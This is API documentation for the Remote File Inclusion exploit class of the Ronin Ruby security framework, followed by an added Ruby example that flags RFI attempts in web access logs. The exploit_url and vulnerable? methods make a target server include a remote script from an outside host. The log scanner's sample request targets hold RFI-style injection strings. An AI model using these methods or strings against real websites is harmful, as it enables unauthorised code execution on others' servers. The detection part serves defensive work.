Class: Ronin::Exploits::RFI

Inherits: Web
Defined in: lib/ronin/exploits/rfi.rb

Overview

Represents Remote File Inclusion (RFI) exploits.

Since:

  • 1.0.0

Constant Summary

TEST_SCRIPTS

Default URL of the RFI test script, keyed by scripting language.

Since:

  • 1.0.0

TEST_SCRIPTS = {
  PHP: 'http://ronin-ruby.github.com/static/ronin/php/rfi/test.php'
}

EXTS

The script extensions and their languages.

Since:

  • 1.0.0

EXTS = {
  '.asp'  => :ASP,
  '.aspx' => :ASP,
  '.cfm'  => :ColdFusion,
  '.cfml' => :ColdFusion,
  '.jsp'  => :JSP,
  '.php'  => :PHP,
  '.pl'   => :Perl,
  ''      => :unknown
}

Constants inherited from HTTP

HTTP::DEFAULT_PORT

Instance Attribute Summary

Attributes inherited from Exploit

#encoders, #helpers, #raw_payload, #restricted_chars, #target

Attributes included from Payloads::HasPayload

#payload

Instance Method Summary

Methods inherited from Web

#exploit, #http_request, #normal_body, #normal_response, test, #url, #url_query_param_value

Methods inherited from HTTP

#url_for

Methods inherited from RemoteTCP

#deploy!, #test!

Methods included from Model::HasDefaultPort

included

Methods inherited from Exploit

#advisory, advisory, #arch, #build!, #build_payload!, #deploy!, #encode_payload, #encode_payload!, #evacuate!, #exploit!, #helper, #initialize, #os, #payload=, #restrict, #software, #targeting, #targeting_arch, targeting_arch, #targeting_os, targeting_os, #targeting_software, targeting_software, #use_target!

Methods included from Tests

#is_restricted?, #test_arch!, #test_os!, #test_restricted!, #test_software!, #test_target!

Methods included from PostExploitation::Mixin

#fs, #post_exploitation, #process, #resources, #shell

Methods included from Payloads::HasPayload

#default_payload, #initialize, #method_missing, #payload_class, #respond_to?, #use_payload!, #use_payload_from!

Constructor Details

This class inherits a constructor from Ronin::Exploits::Exploit

Dynamic Method Handling

This class handles dynamic methods through the method_missing method in the class Ronin::Payloads::HasPayload

Instance Method Details

#exploit_url(remote_url, query_params = {}) ⇒ URI::HTTP

Creates an exploit URL which includes the remote URL.

Since:

  • 1.0.0


# File 'lib/ronin/exploits/rfi.rb', line 89

def exploit_url(remote_url,query_params={})
  if terminate?
    remote_url = "#{remote_url}?"
  end

  return super(remote_url,query_params)
end

#script_language ⇒ Symbol

The Scripting Language the URL is using.

Since:

  • 1.0.0


# File 'lib/ronin/exploits/rfi.rb', line 63

def script_language
  EXTS[File.extname(self.url_path)]
end

#test_script ⇒ String?

The remote script to test the URL for Remote File Inclusion (RFI).

Since:

  • 1.0.0


# File 'lib/ronin/exploits/rfi.rb', line 73

def test_script
  TEST_SCRIPTS[script_language]
end

#vulnerable? ⇒ Boolean

Determines if the URL is vulnerable to RFI.

Since:

  • 1.0.0


# File 'lib/ronin/exploits/rfi.rb', line 103

def vulnerable?
  unless script_language
    raise(NotImplementedError,"cannot test against #{script_language}")
  end

  unless (remote_url = test_script)
    raise(NotImplementedError,"no test script for #{script_language}")
  end

  challenge = Chars::ALPHA.random_string(10)
  expected  = Digest::MD5.hexdigest(challenge)
  body      = exploit(remote_url, 'test' => challenge).body

  return body.include?(expected)
end
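
Detection counterpart to the URLs built by #exploit_url, as an added example that is not part of Ronin: it scans request targets from a web access log for query parameters whose value is a remote URL, and records whether that URL carries the trailing "?" terminator. The helper names (decode_fully, rfi_findings), the SCRIPT_EXTS list and the sample request targets are assumptions constructed for this illustration.

```ruby
require 'uri'

# Script extensions to watch; these mirror the non-empty keys of EXTS above.
SCRIPT_EXTS = %w[.asp .aspx .cfm .cfml .jsp .php .pl].freeze

# A parameter value that is itself an absolute remote URL.
REMOTE_URL = %r{\A(?:https?|ftp)://[^/\s]+}i

# Undo up to max_rounds layers of percent-encoding, so a double-encoded
# URL is still recognised after a single-pass filter has missed it.
def decode_fully(raw, max_rounds = 3)
  max_rounds.times do
    decoded = begin
      URI.decode_www_form_component(raw)
    rescue ArgumentError
      raw # malformed %-escape: keep the value as logged
    end
    break if decoded == raw
    raw = decoded
  end
  raw.scrub
end

# Hypothetical helper: takes the request target (path + query) from one
# access-log entry and returns one finding per URL-valued parameter.
def rfi_findings(request_target)
  path, query = request_target.split('?', 2)
  return [] unless query && SCRIPT_EXTS.include?(File.extname(path).downcase)

  query.split(/[&;]/).filter_map do |pair|
    name, raw = pair.split('=', 2)
    next unless raw
    value = decode_fully(raw)
    next unless value.match?(REMOTE_URL)
    # A trailing "?" makes any suffix the application appends part of the query.
    { param: decode_fully(name), url: value, terminated: value.end_with?('?') }
  end
end

# Constructed sample request targets (not real traffic).
SAMPLES = [
  '/index.php?page=http%3A%2F%2Ffiles.example.net%2Ftest.php%3F&test=abcdefghij',
  '/view.jsp?tpl=http%253A%252F%252Ffiles.example.net%252Fx.txt',
  '/index.php?page=about',
  '/logo.png?src=http://cdn.example.com/a.png'
].freeze

SAMPLES.each { |t| puts "#{t} -> #{rfi_findings(t).inspect}" } if $PROGRAM_NAME == __FILE__
```

Legitimate URL-valued parameters (redirect targets, webhook callbacks) also match, so treat a finding as a triage signal and weight the terminated and multiply-encoded cases higher.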